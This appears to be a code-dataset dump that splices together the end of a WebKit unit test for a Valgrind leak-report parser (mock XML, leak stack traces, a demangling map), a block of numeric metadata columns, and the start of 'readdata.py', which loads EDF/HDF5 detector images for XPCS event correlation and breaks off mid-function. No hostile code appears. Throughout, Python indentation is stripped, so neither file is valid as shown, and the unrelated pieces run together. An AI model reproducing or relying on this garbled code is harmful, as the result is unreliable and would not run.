<arg>--suppressions=/home/user/WebKit/Tools/Scripts/valgrind/suppressions.txt</arg>
<arg>--suppressions=/usr/lib/valgrind/debian-libc6-dbg.supp</arg>
</vargv>
<argv>
<exe>/home/user/WebKit/WebKitBuild/Release/Programs/{process_name}</exe>
<arg>-</arg>
</argv>
</args>
<status>
<state>RUNNING</state>
<time>00:00:00:00.024 </time>
</status>
""".format(process_name=process_name, pid=pid, uuid=uuid)
def make_mock_valgrind_results():
return """-----------------------------------------------------
Suppressions used:
count name
2 __nss_database_lookup (Third Party)
2 cairo_set_source_surface (Third Party)
2 g_quark_from_static_string (Third party)
2 g_task_run_in_thread (Third Party)
2 gtk_css_provider_load_from_data (Third Party)
2 gtk_window_realize (Third Party)
2 libenchant.so new (Third party)
4 WTF::ThreadIdentifierData::initialize() (Intentional)
4 libGL.so (Third party)
18 FcPatternObjectInsertElt 2 (Third Party)
54 FcConfigParseAndLoad (Third Party)
160 webkitAccessibleNew
214 FcConfigAppFontAddFile (Third Party)
354 g_thread_proxy (Third Party)
4196 gtk_init_check (Third Party)
-----------------------------------------------------
Valgrind detected 2 leaks:
Leak_DefinitelyLost
8 bytes in 1 blocks are definitely lost in loss record 422 of 7,972
operator new(unsigned long) (/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
webkit_web_policy_decision_new (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebKit::FrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, std::function<void (WebCore::PolicyAction)>) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::DocumentLoader::responseReceived(WebCore::CachedResource*, WebCore::ResourceResponse const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::sendRequestCallback(_GObject*, _GAsyncResult*, void*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
g_task_return_now (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio/gtask.c:1108)
complete_in_idle_cb (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/gio/gtask.c:1117)
g_main_context_dispatch (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib/gmain.c:3065)
g_main_context_iterate.isra.23 (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib/gmain.c:3712)
g_main_loop_run (/home/user/WebKit/WebKitBuild/Dependencies/Source/glib-2.38.0/glib/gmain.c:3906)
gtk_main (/home/user/WebKit/WebKitBuild/Dependencies/Source/gtk+-3.6.0/gtk/gtkmain.c:1162)
runTest(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
runTestingServerLoop() (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
main (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
Suppression (error hash=#8313DEB16B069438#):
{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znw*
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_
fun:_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE
fun:_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE
fun:_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE
fun:_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv
fun:g_task_return_now
fun:complete_in_idle_cb
fun:g_main_context_dispatch
fun:g_main_context_iterate.isra.23
fun:g_main_loop_run
fun:gtk_main
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}
Leak_DefinitelyLost
8 bytes in 1 blocks are definitely lost in loss record 421 of 7,972
operator new(unsigned long) (/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
webkit_web_policy_decision_new (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebKit::FrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::function<void (WebCore::PolicyAction)>) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::FrameLoader::load(WebCore::DocumentLoader*) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
WebCore::FrameLoader::load(WebCore::FrameLoadRequest const&) (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
webkit_web_frame_load_uri (/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3)
runTest(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
runTestingServerLoop() (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
main (/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree)
Suppression (error hash=#0449D3ED253FE1F9#):
{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znw*
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_
fun:_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE
fun:_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE
fun:_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE
fun:webkit_web_frame_load_uri
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}
"""
valgrind_output_cppfilt_map = {
'_Znwm': u'operator new(unsigned long)',
'_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation': u'std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation)',
'webkit_web_policy_decision_new': u'webkit_web_policy_decision_new',
'_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE': u'WebKit::FrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::function<void (WebCore::PolicyAction)>)',
'_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_': u'WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, void (*)(void*, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool), void*)',
'_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE': u'WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>)',
'_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE': u'WebCore::FrameLoader::load(WebCore::DocumentLoader*)',
'_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE': u'WebCore::FrameLoader::load(WebCore::FrameLoadRequest const&)',
'webkit_web_frame_load_uri': u'webkit_web_frame_load_uri',
'_ZL7runTestRKSs': u'runTest(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)',
'_ZL20runTestingServerLoopv': u'runTestingServerLoop()',
'main': u'main',
'_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation': u'std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}>::_M_manager(std::_Any_data&, std::_Function_base::_Base_manager<WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)::{lambda(WebCore::PolicyAction)#1}> const&, std::_Manager_operation)',
'webkit_web_policy_decision_new': u'webkit_web_policy_decision_new',
'_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE': u'WebKit::FrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, std::function<void (WebCore::PolicyAction)>)',
'_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_': u'WebCore::PolicyChecker::checkContentPolicy(WebCore::ResourceResponse const&, void (*)(void*, WebCore::PolicyAction), void*)',
'_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE': u'WebCore::DocumentLoader::responseReceived(WebCore::CachedResource*, WebCore::ResourceResponse const&)',
'_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE': u'WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&)',
'_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE': u'WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&)',
'_ZN7WebCoreL19sendRequestCallbackEP8_GObjectP13_GAsyncResultPv': u'WebCore::sendRequestCallback(_GObject*, _GAsyncResult*, void*)',
'g_task_return_now': u'g_task_return_now',
'complete_in_idle_cb': u'complete_in_idle_cb',
'g_main_context_dispatch': u'g_main_context_dispatch',
'g_main_context_iterate.isra.23': u'g_main_context_iterate.isra.23',
'g_main_loop_run': u'g_main_loop_run',
'gtk_main': u'gtk_main',
}
def make_mock_valgrind_results_incomplete():
return """could not parse <?xml version="1.0"?>
<valgrindoutput>
<protocolversion>4</protocolversion>
<protocoltool>memcheck</protocoltool>
<preamble>
<line>Memcheck, a memory error detector</line>
<line>Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.</line>
<line>Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info</line>
<line>Command: /home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree -</line>
</preamble>
<pid>28531</pid>
<ppid>18577</ppid>
<tool>memcheck</tool>
<args>
<vargv>
<exe>/usr/bin/valgrind.bin</exe>
<arg>--tool=memcheck</arg>
<arg>--num-callers=40</arg>
<arg>--demangle=no</arg>
<arg>--trace-children=no</arg>
<arg>--smc-check=all-non-file</arg>
<arg>--leak-check=yes</arg>
<arg>--leak-resolution=high</arg>
<arg>--show-possibly-lost=no</arg>
<arg>--show-reachable=no</arg>
<arg>--leak-check=full</arg>
<arg>--undef-value-errors=no</arg>
<arg>--gen-suppressions=all</arg>
<arg>--xml=yes</arg>
<arg>--xml-file=/home/user/WebKit/WebKitBuild/Release/layout-test-results/drt-28531-e8c7d7b83be411e390c9d43d7e01ba08-leaks.xml</arg>
<arg>--suppressions=/home/user/WebKit/Tools/Scripts/valgrind/suppressions.txt</arg>
<arg>--suppressions=/usr/lib/valgrind/debian-libc6-dbg.supp</arg>
</vargv>
<argv>
<exe>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</exe>
<arg>-</arg>
</argv>
</args>
<status>
<state>RUNNING</state>
<time>00:00:00:00.024 </time>
</status>
: no element found: line 49, column 0
-----------------------------------------------------
Suppressions used:
count name
-----------------------------------------------------
"""
def make_mock_valgrind_results_empty():
return """could not parse : no element found: line 1, column 0
-----------------------------------------------------
Suppressions used:
count name
-----------------------------------------------------
"""
def make_mock_valgrind_results_misformatted():
return """could not parse Junk that should not appear in a valgrind xml file<?xml version="1.0"?: syntax error: line 1, column 0
-----------------------------------------------------
Suppressions used:
count name
-----------------------------------------------------
"""
def mock_run_cppfilt_command(args):
if args[0] == 'c++filt':
return valgrind_output_cppfilt_map[string_utils.decode(args[2], target_type=str)]
return ""
class LeakDetectorValgrindTest(unittest.TestCase):
def test_parse_and_print_leaks_detail_pass(self):
mock_valgrind_output1 = make_mock_valgrind_output('DumpRenderTree', 28529, 'db92e4843be411e3bae1d43d7e01ba08')
mock_valgrind_output2 = make_mock_valgrind_output('DumpRenderTree', 28530, 'dd7213423be411e3aa7fd43d7e01ba08')
files = {}
files['/tmp/layout-test-results/drt-28529-db92e4843be411e3bae1d43d7e01ba08-leaks.xml'] = mock_valgrind_output1
files['/tmp/layout-test-results/drt-28530-dd7213423be411e3aa7fd43d7e01ba08-leaks.xml'] = mock_valgrind_output2
leakdetector_valgrind = LeakDetectorValgrind(MockExecutive2(run_command_fn=mock_run_cppfilt_command), MockFileSystem(files), '/tmp/layout-test-results/')
OutputCapture().assert_outputs(self, leakdetector_valgrind.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results())
def test_parse_and_print_leaks_detail_incomplete(self):
mock_incomplete_valgrind_output = make_mock_incomplete_valgrind_output('DumpRenderTree', 28531, 'e8c7d7b83be411e390c9d43d7e01ba08')
files = {}
files['/tmp/layout-test-results/drt-28531-e8c7d7b83be411e390c9d43d7e01ba08-leaks.xml'] = mock_incomplete_valgrind_output
leakdetector_valgrind = LeakDetectorValgrind(MockExecutive2(), MockFileSystem(files), '/tmp/layout-test-results/')
OutputCapture().assert_outputs(self, leakdetector_valgrind.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results_incomplete())
def test_parse_and_print_leaks_detail_empty(self):
files = {}
files['/tmp/Logs/layout-test-results/drt-28532-ebc9a6c63be411e399d4d43d7e01ba08-leaks.xml'] = ""
leakdetector_valgrind = LeakDetectorValgrind(MockExecutive2(), MockFileSystem(files), '/tmp/layout-test-results/')
OutputCapture().assert_outputs(self, leakdetector_valgrind.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results_empty())
def test_parse_and_print_leaks_detail_misformatted(self):
self.maxDiff = None
misformatted_mock_valgrind_output = 'Junk that should not appear in a valgrind xml file' + make_mock_valgrind_output('DumpRenderTree', 28533, 'fa6d0cd63be411e39c72d43d7e01ba08')[:20]
files = {}
files['/tmp/layout-test-results/drt-28533-fa6d0cd63be411e39c72d43d7e01ba08-leaks.xml'] = misformatted_mock_valgrind_output
leakdetector_valgrind = LeakDetectorValgrind(MockExecutive2(), MockFileSystem(files), '/tmp/layout-test-results/')
OutputCapture().assert_outputs(self, leakdetector_valgrind.parse_and_print_leaks_detail, [files], expected_logs=make_mock_valgrind_results_misformatted())
| 51.707403
| 956
| 0.767084
| 4,769
| 44,003
| 6.856783
| 0.112602
| 0.020795
| 0.036391
| 0.062691
| 0.843884
| 0.802171
| 0.779174
| 0.767554
| 0.75633
| 0.746575
| 0
| 0.057929
| 0.09888
| 44,003
| 850
| 957
| 51.768235
| 0.766746
| 0.029453
| 0
| 0.738562
| 0
| 0.120261
| 0.922684
| 0.665854
| 0
| 0
| 0.008997
| 0
| 0.005229
| 1
| 0.014379
| false
| 0.048366
| 0.007843
| 0.007843
| 0.033987
| 0.010458
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c4a8c3715e209395878d30c55cb512377cb6e24
| 15,161
|
py
|
Python
|
dynamix/io/readdata.py
|
kif/dynamix
|
163323ccb083bb069d88f3b51c0dfb3141f5fd37
|
[
"MIT"
] | 3
|
2021-01-12T05:46:51.000Z
|
2021-04-13T15:05:42.000Z
|
dynamix/io/readdata.py
|
kif/dynamix
|
163323ccb083bb069d88f3b51c0dfb3141f5fd37
|
[
"MIT"
] | 18
|
2019-08-23T08:42:36.000Z
|
2021-09-13T15:14:38.000Z
|
dynamix/io/readdata.py
|
kif/dynamix
|
163323ccb083bb069d88f3b51c0dfb3141f5fd37
|
[
"MIT"
] | 6
|
2019-08-01T12:10:52.000Z
|
2021-12-09T14:55:02.000Z
|
#! /usr/bin/env python3
# readdata
import numpy as np
import numba as nb
from dynamix.io import nfiles
import _pickle as cPickle
from dynamix.correlator.WXPCS import dropimgood, eigerpix
from multiprocessing import Process, Queue
from dynamix.io import EdfMethods
from sys import exit, stdout
import time
import h5py # HDF5 support
import hdf5plugin
import os
os.environ["HDF5_USE_FILE_LOCKING"] = "FALSE"
####### Save pixels and intensities ######
def events_load(fname):
edata = open(fname, 'rb')
pixels, s = cPickle.load(edata)
edata.close()
return pixels, s
def events_save(fname, pixels, s):
edata = open(fname, 'wb')
cPickle.dump([pixels, s], edata, -1)
edata.close()
return
######## Read npz #####
def readnpz(FileName):
f = np.load(FileName)
# data = f['data']
data = f[f.files[0]]
f.close()
return data
######## save npz #####
def savenpz(FileName, data):
np.savez_compressed(FileName, data=data)
######### processing the file for Eiger,Maxipix etc ##############
def mread_eiger(mfilename, mdataout, ind_g, mNp, nx):
for mfile in mfilename:
matr = EdfMethods.loadedf(mfile)
msumpix, mpix = eigerpix(matr[ind_g], mNp, nx)
mpix = mpix[:msumpix]
mdataout.put([mpix, msumpix, matr])
mdataout.close()
###########################################
# ######### processing the file for CCD ##############
def mread_ccd(mfilename, mdataout, darkimg, lth, bADU, tADU, mNp, aduph, nx, ny):
for mfile in mfilename:
matr = np.asfarray(EdfMethods.loadedf(mfile), dtype=np.float32)
# try:
# matr[ind] = 0
# except:
# pass
msumpix, mpix, tmp = dropimgood(matr, darkimg, lth, bADU, tADU, mNp, aduph, nx, ny) # dropletize CCD frames
mpix = mpix[:msumpix]
mdataout.put([mpix, msumpix, tmp])
mdataout.close()
# ###########################################
def get_data(datdir, prefd, sufd, nf1, nf2):
# read Maxipix, Eiger edf images ####
t0 = time.time()
swrite = stdout.write
sflush = stdout.flush
print("start reading the files")
# creating filenames
filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
lfilenames = len(filenames)
# reading first image to get dimenstions of the matrix
headers = EdfMethods.headeredf(filenames[0])
dim1 = np.intc(headers['Dim_1'])
dim2 = np.intc(headers['Dim_2'])
nx = dim2
ny = dim1
data = np.zeros((lfilenames, nx, ny), np.uint16)
i = 0
for mfile in filenames:
data[i,:,:] = EdfMethods.loadedf(mfile)
i += 1
swrite(4 * '\x08')
swrite(str(int(i * 100. / lfilenames)) + '%')
sflush()
print("\n")
print("Reading time %3.3f sec" % (time.time() - t0))
return data
def get_eiger_event_data(datdir, prefd, sufd, nf1, nf2, sname, mNp, savdir, mask_file):
### read maxipix, Eiger edf images and convert for event correlator ####
time0 = time.time()
swrite = stdout.write
sflush = stdout.flush
print("start reading the files")
# creating filenames
filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
lfilenames = len(filenames) # -1
# reading first image to get dimenstions of the matrix
headers = EdfMethods.headeredf(filenames[0])
dim1 = np.intc(headers['Dim_1'])
dim2 = np.intc(headers['Dim_2'])
############reading mask##########
try:
mask_data = EdfMethods.loadedf(mask_file)
print("use mask file " + mask_file)
ind = np.where(mask_data > 0)
ind_g = np.where(mask_data < 1)
for_norm = dim1 * dim2 - len(mask_data[ind])
except:
print("no mask applied")
for_norm = dim1 * dim2 # 1024**2
pass
print("Numebr of pixels used " + str(for_norm))
########creating image matrix of zeros############
img = np.zeros((dim2, dim1))
pixels = []
s = []
data = []
pread = []
nx = len(img[ind_g])
for i in range(2):
data.append(Queue(2))
# pread.append(Process(target=mread_eiger, args=(filenames[i:-1:2],data[i],ind_g,mNp,nx)))
pread.append(Process(target=mread_eiger, args=(filenames[:-1:2], data[0], ind_g, mNp, nx)))
pread.append(Process(target=mread_eiger, args=(filenames[1::2], data[1], ind_g, mNp, nx)))
for i in range(2):
pread[i].start()
ii = 0
###########reading and summing files ###########
for i in range(lfilenames):
swrite(4 * '\x08')
swrite(str(int(i * 100. / lfilenames)) + '%')
sflush()
fromproc = data[ii].get()
pixels.append(fromproc[0])
s.append(fromproc[1])
img += fromproc[2]
ii += 1
if ii == 2:
ii = 0
for i in range(2):
pread[i].join()
data[i].close()
dtime = time.time() - time0
print('reading of %d files took %5.2f sec' % (lfilenames, dtime))
if not os.path.exists(savdir):
answ = input("create a director (y)/n").lower()
if answ == "n":
print("exit")
exit()
else:
os.makedirs(savdir)
print("directory " + savdir + " has been created")
return pixels, s, for_norm, img
def get_ccd_event_data(datdir, prefd, sufd, nf1, nf2, darkdir, df1, df2, sname, lth, bADU, tADU, mNp, aduph, savdir, mask_file):
### read ccd edf images and convert for event correlator ####
time0 = time.time()
swrite = stdout.write
sflush = stdout.flush
print("start reading the files")
# creating filenames
filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
lfilenames = len(filenames) # -1
# reading first image to get dimenstions of the matrix
headers = EdfMethods.headeredf(filenames[0])
dim1 = np.intc(headers['Dim_1'])
dim2 = np.intc(headers['Dim_2'])
nx = dim2
ny = dim1
############reading mask##########
try:
mask_data = EdfMethods.loadedf(mask_file)
print("use mask file " + mask_file)
ind = np.where(mask_data > 0)
for_norm = dim1 * dim2 - len(mask_data[ind])
except:
print("no mask applied")
for_norm = dim1 * dim2 # 1024**2
pass
print("Numebr of pixels used " + str(for_norm))
########creating image matrix of zeros############
img = np.zeros((dim2, dim1))
########reading dark##########
darkfilenames = nfiles.filename(darkdir + prefd, sufd, df1, df2)
ndarks = 0
for dfile in darkfilenames:
if ndarks == 0:
darkimg = np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
else:
darkimg += np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
ndarks += 1
darkimg = darkimg / ndarks
pixels = []
s = []
data = []
pread = []
for i in range(2):
data.append(Queue(2))
# pread.append(Process(target=mread_ccd, args=(filenames[i:-1:2],data[i],darkimg,lth,bADU,tADU,mNp,aduph,nx,ny)))
pread.append(Process(target=mread_ccd, args=(filenames[:-1:2], data[0], darkimg, lth, bADU, tADU, mNp, aduph, nx, ny)))
pread.append(Process(target=mread_ccd, args=(filenames[1::2], data[1], darkimg, lth, bADU, tADU, mNp, aduph, nx, ny)))
for i in range(2):
pread[i].start()
ii = 0
###########reading and summing files###########
for i in range(lfilenames):
swrite(4 * '\x08')
swrite(str(int(i * 100. / lfilenames)) + '%')
sflush()
fromproc = data[ii].get()
pixels.append(fromproc[0])
s.append(fromproc[1])
img += fromproc[2]
ii += 1
if ii == 2:
ii = 0
for i in range(2):
pread[i].join()
data[i].close()
dtime = time.time() - time0
print('reading of %d files took %5.2f sec' % (lfilenames, dtime))
if not os.path.exists(savdir):
answ = input("create a director (y)/n")
if answ == "n":
print("exit")
exit()
else:
os.makedirs(savdir)
print("directory " + savdir + " has been created")
return pixels, s, for_norm, img
def get_delta(datdir, prefd, sufd, nf1, nf2, scan="1"):
if sufd == ".edf":
filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
h = EdfMethods.headeredf(filenames[10])
delta = float(h['motor_pos'].split(" ")[h['motor_mne'].split(" ").index('del')])
if sufd == ".h5":
filename = datdir + prefd + sufd
with h5py.File(filename, mode="r") as h5:
delta = h5['/' + scan + '.1/instrument/positioners/delta'][()]
return delta
def get_eiger_event_datan(datdir, prefd, sufd, nf1, nf2, sname, mNp, savdir, mask_file, thr=20, frc=0.15):
### read ccd edf images and convert for Pierre's event correlator using numba ####
t0 = time.time()
swrite = stdout.write
sflush = stdout.flush
print("start reading the files")
# creating filenames
filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
lfilenames = len(filenames) # -1
# reading first image to get dimenstions of the matrix
headers = EdfMethods.headeredf(filenames[0])
dim1 = np.intc(headers['Dim_1'])
dim2 = np.intc(headers['Dim_2'])
nx = dim2
ny = dim1
############reading mask##########
try:
mask_data = EdfMethods.loadedf(mask_file)
print("use mask file " + mask_file)
ind = np.where(mask_data > 0)
for_norm = dim1 * dim2 - len(mask_data[ind])
except:
mask_data = np.zeros((dim2, dim1), np.uint8)
print("no mask applied")
for_norm = dim1 * dim2 # 1024**2
pass
print("Numebr of pixels used " + str(for_norm))
n_frames = len(filenames)
ll = nx * ny # total number of pixels
lp = int(n_frames * frc) # total number of frames with events 15%
mask = np.array(np.ravel(mask_data), np.uint8)
evs = np.zeros((ll, lp), np.uint8)
tms = np.zeros((ll, lp), np.uint16)
cnt = np.ravel(np.zeros((ll,), np.uint16))
afr = np.ravel(np.zeros((ll,), np.uint32))
tr = 0
trace = np.zeros((n_frames,), np.uint32)
it = 0
print("Number of frames %d" % n_frames)
###########reading and summing files###########
for i in range(lfilenames):
swrite(4 * '\x08')
swrite(str(int(i * 100. / lfilenames)) + '%')
sflush()
matr = EdfMethods.loadedf(filenames[i])
try:
matr[ind] = 0
except:
pass
fr = np.ravel(matr)
